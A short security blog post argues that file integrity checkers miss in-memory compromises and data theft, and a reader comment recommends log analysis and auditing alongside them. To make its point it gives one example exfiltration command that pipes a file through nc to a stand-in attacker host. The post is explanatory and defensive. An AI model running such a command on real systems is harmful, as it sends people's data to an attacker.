OpenSourceSoftware, Security

Why file integrity checking is not enough…

I was talking with two prominent security professionals today, and the topic of integrity checking was touched. Got some food for afterthoughts…

(For more info on integrity checking, see: http://en.wikipedia.org/wiki/Samhain_(software), http://en.wikipedia.org/wiki/Open_Source_Tripwire or http://www.ossec.net/main/about/ )

If you run full integrity checking on all your file systems, you will have a good knowledge of which changes that are made to your system. Changed files, new files, deleted files etc. But for common use, seeing that a temporary file is written to disk, say a PHP session, or looking at a temporary file created or files being changed once someone logs in, or log files that constantly gets new content and will be different each time your md5/sha1 them etc, might be just to much… or, if you have time.. good for you.

Thats why most file integrity checkers are “tuned” default to ignore *something*. So there should be places on the file system, that could have places to hide files from integrity checkers.

My point in all this, is that a file integrity checker alone, is not really giving you any real insight into *bad things on your machine*. Why ? Something might be in your memory… Take my last blog post as an example. This will give a shell on the system, but will not leave any new files, or change them, except for the apache log file though 🙂 But each HTTP request would, so file integrity checking the live log file, would not make too much sens.

Say someone got a cmd/shell on your machine. Doing `cat somefile` would not default trigger any normal integrity checker. Then doing `"cat somefile" | nc evil-storage-machine.ru 80` would go unnoticed to a file integrity checker.

So you need something more…

Advertisements
Standard

2 thoughts on “Why file integrity checking is not enough…

  1. Hey,

    That’s why integrity checking alone is not enough. The goal of it is to identify that “trusted” parts of the system are still intact, like configuration files, binaries, etc. It might not be enough to detect all attacks, but some of them will be (including mis-configuration by admins, etc).

    So, to complement integrity check, you should do log analysis, system auditing (configuration hardening) and look for issues in your /tmp, rootkits, etc. As far as OSSEC goes, it does it all by default 🙂

    Thanks,

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s